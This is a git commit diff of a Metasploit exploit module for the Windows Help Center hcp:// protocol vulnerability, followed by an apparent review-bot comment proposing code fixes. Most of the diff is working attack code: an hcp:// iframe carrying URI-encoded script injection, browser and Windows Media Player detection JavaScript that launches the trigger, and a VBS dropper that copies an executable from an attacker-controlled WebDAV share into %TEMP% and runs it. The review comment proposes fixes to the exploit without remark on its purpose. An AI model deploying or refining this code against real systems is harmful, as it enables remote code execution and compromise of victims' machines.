Bug fixes for WMP11 and IE8, new configurable setting for exploit trigger, and output cleanup.

git-svn-id: file:///home/svn/framework3/trunk@9495 4d416f70-5f16-0410-b530-b9f4589650da
unstable
natron 2010-06-11 20:54:35 +00:00
parent 33212ae5ba
commit 7cbc566c7b
1 changed files with 49 additions and 51 deletions


@ -19,7 +19,6 @@ class Metasploit3 < Msf::Exploit::Remote
# #
include Msf::Exploit::Remote::HttpServer::HTML include Msf::Exploit::Remote::HttpServer::HTML
include Msf::Exploit::EXE include Msf::Exploit::EXE
include Msf::Exploit::CmdStagerVBS
def initialize(info = {}) def initialize(info = {})
super(update_info(info, super(update_info(info,
@ -30,13 +29,15 @@ class Metasploit3 < Msf::Exploit::Remote
directly via URLs by installing a protocol handler for the scheme "hcp". Due to directly via URLs by installing a protocol handler for the scheme "hcp". Due to
an error in validation of input to hcp:// combined with a local cross site an error in validation of input to hcp:// combined with a local cross site
scripting vulnerability and a specialized mechanism to launch the XSS trigger, scripting vulnerability and a specialized mechanism to launch the XSS trigger,
arbitrary command execution can be achieved. arbitrary command execution can be achieved.
On IE6 and IE7 on XP SP2 or SP3, code execution is automatic. On IE8, a dialog On IE7 on XP SP2 or SP3, code execution is automatic. If WMP9 is installed, it
box pops, but if WMP9 is installed, WMP9 can be used for automatic execution. can be used to launch the exploit automatically. If IE8 and WMP11, either can
If IE8 and WMP11, a dialog box will ask the user if execution should continue. be used to launch the attack, but both pop dialog boxes asking the user if
Automatic detection of these options is implemented in this module, and will execution should continue. This exploit detects if non-intrusive mechanisms are
default to not sending the exploit for IE8/WMP11 unless the option is overridden. available and will use one if possible. In the case of both IE8 and WMP11, the
exploit defaults to using an iframe on IE8, but is configurable by setting the
DIALOGMECH option to "none" or "player".
}, },
'Author' => 'Author' =>
[ [
@ -63,20 +64,16 @@ class Metasploit3 < Msf::Exploit::Remote
'Platform' => 'win', 'Platform' => 'win',
'Targets' => 'Targets' =>
[ [
[ 'Automatic', { } ], # Only automatic for now. [ 'Automatic', { } ]
#[ 'IE6/IE7', { 'trigger_method' => 'iframe' } ], # Only tested IE7 / XP SP2,3
#[ 'IE8/WMP9', { 'trigger_method' => 'asx' } ], # untested
#[ 'IE8/WMP11', { 'trigger_method' => 'asx' } ], # tested, pops dialog box
], ],
'DisclosureDate' => 'June 09, 2010', 'DisclosureDate' => 'June 09, 2010',
'DefaultTarget' => 0)) 'DefaultTarget' => 0))
register_options( register_options(
[ [
#OptString.new( 'CMD', [ true, "The URI-encoded command to execute.", "calc.exe" ]),
OptBool.new( 'RUNWITHDIALOG', [ true, "Proceed with exploit even if it will pop a dialog to the user?", false]),
OptPort.new( 'SRVPORT', [ true, "The daemon port to listen on", 80 ]), OptPort.new( 'SRVPORT', [ true, "The daemon port to listen on", 80 ]),
OptString.new( 'URIPATH', [ true, "The URI to use.", "/" ]) OptString.new( 'URIPATH', [ true, "The URI to use.", "/" ]),
OptString.new( 'DIALOGMECH', [ true, "IE8/WMP11 trigger mechanism (none, iframe, or player).", "iframe"])
], self.class) ], self.class)
deregister_options('SSL', 'SSLVersion') # Just for now deregister_options('SSL', 'SSLVersion') # Just for now
@ -112,16 +109,12 @@ class Metasploit3 < Msf::Exploit::Remote
def process_get(cli, request) def process_get(cli, request)
#print_status("Responding to GET request from #{cli.peerhost}:#{cli.peerport}")
@my_host = (datastore['SRVHOST'] == '0.0.0.0') ? Rex::Socket.source_address(cli.peerhost) : datastore['SRVHOST'] @my_host = (datastore['SRVHOST'] == '0.0.0.0') ? Rex::Socket.source_address(cli.peerhost) : datastore['SRVHOST']
webdav_loc = "\\\\#{@my_host}\\#{@random_dir}\\#{@payload}" webdav_loc = "\\\\#{@my_host}\\#{@random_dir}\\#{@payload}"
@url_base = "http://" + @my_host @url_base = "http://" + @my_host
if (Regexp.new(Regexp.escape(@payload)+'$', true).match(request.uri)) if (Regexp.new(Regexp.escape(@payload)+'$', true).match(request.uri))
print_status "GET for payload received." print_status "Sending payload executable to target ..."
return if ((p = regenerate_payload(cli)) == nil) return if ((p = regenerate_payload(cli)) == nil)
data = Msf::Util::EXE.to_win32pe(framework, p.encoded) data = Msf::Util::EXE.to_win32pe(framework, p.encoded)
@ -130,20 +123,27 @@ class Metasploit3 < Msf::Exploit::Remote
return return
end end
if request.uri.match(/\.gif$/)
# "world's smallest gif"
data = "GIF89a\x01\x00\x01\x00\x80\x00\x00\x00\x00\x00\x00\x00\x00!\xF9\x04\x01"
data += "\x00\x00\x00\x00,\x00\x00\x00\x00\x01\x00\x01\x00\x00\x02\x02D\x01\x00;"
print_status "Sending gif image to WMP at #{cli.peerhost}:#{cli.peerport} ..."
send_response(cli, data, { 'Content-TYpe' => 'image/gif' } )
end
# ASX Request Inbound # ASX Request Inbound
if request.uri.match(/\.asx$/) if request.uri.match(/\.asx$/)
asx = %Q|<ASX VERSION="3.0"> asx = %Q|<ASX VERSION="3.0">
<PARAM name="HTMLView" value="URLBASE/STARTHELP"/> <PARAM name="HTMLView" value="URLBASE/STARTHELP"/>
<ENTRY> <ENTRY>
<REF href=""/> <REF href="URLBASE/IMGFILE"/>
</ENTRY> </ENTRY>
</ASX> </ASX>
| |
#<REF href="http://www.metasploit.com/images/icbm.jpg"/>
asx.gsub!(/URLBASE/, @url_base) asx.gsub!(/URLBASE/, @url_base)
asx.gsub!(/STARTHELP/, @random_dir + "/" + @start_help) asx.gsub!(/STARTHELP/, @random_dir + "/" + @start_help)
print_status("ASX file requested. Responding to #{cli.peerhost}:#{cli.peerport}...") asx.gsub!(/IMGFILE/, @random_dir + "/" + @img_file)
print_status("Sending asx file to #{cli.peerhost}:#{cli.peerport} ...")
send_response(cli, asx, { 'Content-Type' => 'text/html' }) send_response(cli, asx, { 'Content-Type' => 'text/html' })
return return
end end
@ -152,12 +152,8 @@ class Metasploit3 < Msf::Exploit::Remote
if request.uri.match(/#{@start_help}/) if request.uri.match(/#{@start_help}/)
help_html = %Q|<iframe src="hcp://services/search?query=a&topic=hcp://system/sysinfo/sysinfomain.htm%uFFFF%uFFFF%uFFFF%uFFFF%uFFFF%uFFFF%uFFFF%uFFFF%uFFFF%uFFFF%uFFFF%uFFFF%uFFFF%uFFFF%uFFFF%uFFFF%uFFFF%uFFFF%uFFFF%uFFFF%uFFFF%uFFFF%uFFFF%uFFFF%uFFFF%uFFFF%uFFFF%uFFFF%uFFFF%uFFFF%uFFFF%uFFFF%uFFFF%uFFFF%uFFFF%uFFFF%uFFFF%uFFFF%uFFFF%uFFFF%uFFFF%uFFFF%uFFFF%uFFFF%uFFFF%uFFFF%uFFFF%uFFFF%uFFFF%uFFFF%uFFFF%uFFFF%uFFFF%uFFFF%uFFFF%uFFFF%uFFFF%uFFFF%uFFFF%uFFFF%uFFFF%uFFFF%uFFFF%uFFFF%uFFFF%uFFFF%uFFFF%uFFFF%uFFFF%uFFFF%uFFFF%uFFFF%uFFFF%uFFFF%uFFFF%uFFFF%uFFFF%uFFFF%uFFFF%uFFFF%uFFFF%uFFFF%uFFFF%uFFFF%uFFFF%uFFFF%uFFFF%uFFFF%uFFFF%uFFFF%uFFFF%uFFFF%uFFFF%uFFFF..%5C..%5Csysinfomain.htm%u003fsvr=%3Cscript%20defer%3Eeval%28unescape%28%27COMMANDS%27%29%29%3C/script%3E">| help_html = %Q|<iframe src="hcp://services/search?query=a&topic=hcp://system/sysinfo/sysinfomain.htm%uFFFF%uFFFF%uFFFF%uFFFF%uFFFF%uFFFF%uFFFF%uFFFF%uFFFF%uFFFF%uFFFF%uFFFF%uFFFF%uFFFF%uFFFF%uFFFF%uFFFF%uFFFF%uFFFF%uFFFF%uFFFF%uFFFF%uFFFF%uFFFF%uFFFF%uFFFF%uFFFF%uFFFF%uFFFF%uFFFF%uFFFF%uFFFF%uFFFF%uFFFF%uFFFF%uFFFF%uFFFF%uFFFF%uFFFF%uFFFF%uFFFF%uFFFF%uFFFF%uFFFF%uFFFF%uFFFF%uFFFF%uFFFF%uFFFF%uFFFF%uFFFF%uFFFF%uFFFF%uFFFF%uFFFF%uFFFF%uFFFF%uFFFF%uFFFF%uFFFF%uFFFF%uFFFF%uFFFF%uFFFF%uFFFF%uFFFF%uFFFF%uFFFF%uFFFF%uFFFF%uFFFF%uFFFF%uFFFF%uFFFF%uFFFF%uFFFF%uFFFF%uFFFF%uFFFF%uFFFF%uFFFF%uFFFF%uFFFF%uFFFF%uFFFF%uFFFF%uFFFF%uFFFF%uFFFF%uFFFF%uFFFF%uFFFF%uFFFF%uFFFF..%5C..%5Csysinfomain.htm%u003fsvr=%3Cscript%20defer%3Eeval%28unescape%28%27COMMANDS%27%29%29%3C/script%3E">|
#help_html = %Q|<iframe src="hcp://services/search?query=a&topic=hcp://system/sysinfo/sysinfomain.htm%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A..%5C..%5Csysinfomain.htm%u003fsvr=%3Cscript%20defer%3Eeval%28unescape%28%27COMMANDS%27%29%29%3C/script%3E">|
#help_html = %Q|<iframe src="hcp://services/search?query=a&topic=hcp://system/sysinfo/sysinfomain.htm%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A..%5C..%5Csysinfomain.htm%u003fsvr=%3Cscript%20defer%3Eeval%28unescape%28%27TASKKILL%27%29%29%3C/script%3E">|
# stolen from Rex::Text, modified to return fromCharCode happy numbers
rand_vbs = rand_text_alpha(rand(2)+1) + ".vbs" rand_vbs = rand_text_alpha(rand(2)+1) + ".vbs"
task_cmd = "taskkill /F /IM helpctr.exe"
copy_launch = %Q^cmd /c copy #{webdav_loc} %TEMP% && %TEMP%\\#{@payload}^ copy_launch = %Q^cmd /c copy #{webdav_loc} %TEMP% && %TEMP%\\#{@payload}^
vbs_content = %Q|WScript.CreateObject("WScript.Shell").Run "#{copy_launch}",0,false| vbs_content = %Q|WScript.CreateObject("WScript.Shell").Run "#{copy_launch}",0,false|
write_vbs = %Q|cmd /c echo #{vbs_content}>%TEMP%\\#{rand_vbs}| write_vbs = %Q|cmd /c echo #{vbs_content}>%TEMP%\\#{rand_vbs}|
@ -165,11 +161,9 @@ class Metasploit3 < Msf::Exploit::Remote
concat_cmds = "#{write_vbs}|#{launch_vbs}" concat_cmds = "#{write_vbs}|#{launch_vbs}"
eval_block = "Run(String.fromCharCode(#{convert_to_char_code(concat_cmds)}));" eval_block = "Run(String.fromCharCode(#{convert_to_char_code(concat_cmds)}));"
task_kill = "alert(\"foo\");"#"Run(String.fromCharCode(#{convert_to_char_code(task_cmd)}));"
eval_block = Rex::Text.uri_encode(Rex::Text.uri_encode(eval_block)) eval_block = Rex::Text.uri_encode(Rex::Text.uri_encode(eval_block))
help_html.gsub!(/COMMANDS/, eval_block) help_html.gsub!(/COMMANDS/, eval_block)
#help_html.gsub!(/TASKKILL/, task_kill) print_status("Sending exploit trigger to #{cli.peerhost}:#{cli.peerport} ...")
print_status("Responding to request for exploit iframe at #{cli.peerhost}:#{cli.peerport}...")
send_response(cli, help_html, { 'Content-Type' => 'text/html' }) send_response(cli, help_html, { 'Content-Type' => 'text/html' })
return return
end end
@ -196,33 +190,23 @@ if (window.navigator.appName == "Microsoft Internet Explorer") {
// if ie8, check WMP version // if ie8, check WMP version
if (ver > 7) { if (ver > 7) {
//alert("IE8 detected. Checking WMP version.");
var o = document.createElement("OBJECT"); var o = document.createElement("OBJECT");
o.setAttribute("classid", "clsid:6BF52A52-394A-11d3-B153-00C04F79FAA6"); o.setAttribute("classid", "clsid:6BF52A52-394A-11d3-B153-00C04F79FAA6");
o.setAttribute("uiMode", "invisible"); o.setAttribute("uiMode", "invisible");
// if wmp9 // if wmp9, go ahead and launch
if( parseInt(o.versionInfo) < 10 ) { if( parseInt(o.versionInfo) < 10 ) {
//alert("WMP9 or below detected. Launching exploit.");
o.openPlayer(asx); o.openPlayer(asx);
// if > wmp9, but overridden via dialog // if > wmp9, only launch if user requests
} else { } else {
if( RUNWITHDIALOG ) { DIALOGMECH
//alert(">WMP9 detected but launching anyway.");
o.openPlayer(asx)
} else { //alert("IE8 with > WMP9 detected. Will not launch exploit.");
} }
// if ie7, use iframe
} else {
launchiframe(ifr);
} }
// if ie6 or 7, use iframe
} else { } else {
//alert("< IE8 detected. Launching via iframe.")
launchiframe(ifr);
}
} else {
//alert("Non-IE detected. Launching via iframe.");
// if other, try iframe // if other, try iframe
var o = document.createElement("IFRAME"); launchiframe(ifr);
o.setAttribute("src", ifr);
document.body.appendChild(o);
} }
| |
@ -232,17 +216,31 @@ if (window.navigator.appName == "Microsoft Internet Explorer") {
</body> </body>
</html> </html>
| |
case datastore['DIALOGMECH']
when "player"
mech = "o.openPlayer(asx);"
when "iframe"
mech = "launchiframe(ifr);"
when "none"
mech = ""
else
mech = ""
end
html.gsub!(/JAVASCRIPTFU/, js) html.gsub!(/JAVASCRIPTFU/, js)
html.gsub!(/DIALOGMECH/, mech)
html.gsub!(/URLBASE/, @url_base) html.gsub!(/URLBASE/, @url_base)
html.gsub!(/ASXFILE/, @random_dir + "/" + @asx_file) html.gsub!(/ASXFILE/, @random_dir + "/" + @asx_file)
html.gsub!(/IFRFILE/, @random_dir + "/" + @start_help) html.gsub!(/IFRFILE/, @random_dir + "/" + @start_help)
datastore['RUNWITHDIALOG'] ? override = "true" : override = "false" print_status("Sending exploit html to #{cli.peerhost}:#{cli.peerport} ...")
html.gsub!(/RUNWITHDIALOG/, override)
headers = {
'Content-Type' => 'text/html',
#'X-UA-Compatible' => 'IE=7'
}
print_status("Sending #{self.name} to #{cli.peerhost}:#{cli.peerport}...") send_response(cli, html, headers)
send_response(cli, html, { 'Content-Type' => 'text/html' })
end end
# #
@ -324,7 +322,6 @@ if (window.navigator.appName == "Microsoft Internet Explorer") {
print_status("Sending 404 for #{path} ...") print_status("Sending 404 for #{path} ...")
send_not_found(cli) send_not_found(cli)
return return
end end
# send the response # send the response
@ -339,6 +336,7 @@ if (window.navigator.appName == "Microsoft Internet Explorer") {
@asx_file = rand_text_alpha(rand(2)+1) + ".asx" @asx_file = rand_text_alpha(rand(2)+1) + ".asx"
@start_help = rand_text_alpha(rand(2)+1) + ".html" @start_help = rand_text_alpha(rand(2)+1) + ".html"
@payload = rand_text_alpha(rand(2)+1) + ".exe" @payload = rand_text_alpha(rand(2)+1) + ".exe"
@img_file = rand_text_alpha(rand(2)+1) + ".gif"
if datastore['SRVPORT'].to_i != 80 || datastore['URIPATH'] != '/' if datastore['SRVPORT'].to_i != 80 || datastore['URIPATH'] != '/'
raise RuntimeError, 'Using WebDAV requires SRVPORT=80 and URIPATH=/' raise RuntimeError, 'Using WebDAV requires SRVPORT=80 and URIPATH=/'
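Review bot: The new `.gif` branch in process_get (hunk at -130,20 / +123,27) sends the image but does not `return` afterwards, unlike the `.asx` and start-help branches right below it, so a gif request falls through to the remaining matchers and — if the method ends with the unconditional `send_response(cli, html, headers)` shown in the later hunk, which the visible lines suggest but do not prove — the client gets a second response on the same request. Add `return` directly after the gif `send_response`, matching the sibling branches, and while there correct the header key `'Content-TYpe'` to `'Content-Type'` (header names are case-insensitive on the wire, so this is consistency rather than a functional bug). In the hunk at -232,17 / +216,31, `DIALOGMECH` is registered as a free-form `OptString` and the `case` maps any unrecognised value onto the same empty string as `"none"`, so a typo in the option is silently treated as an explicit choice; registering it as `OptEnum.new( 'DIALOGMECH', [ true, "IE8/WMP11 trigger mechanism.", "iframe", ['none', 'iframe', 'player'] ])` rejects bad values when the option is set and makes the duplicate `else` branch unnecessary. The body of process_get spans several hunks and the statements between them are not visible here, so the fall-through path should be confirmed against the full method.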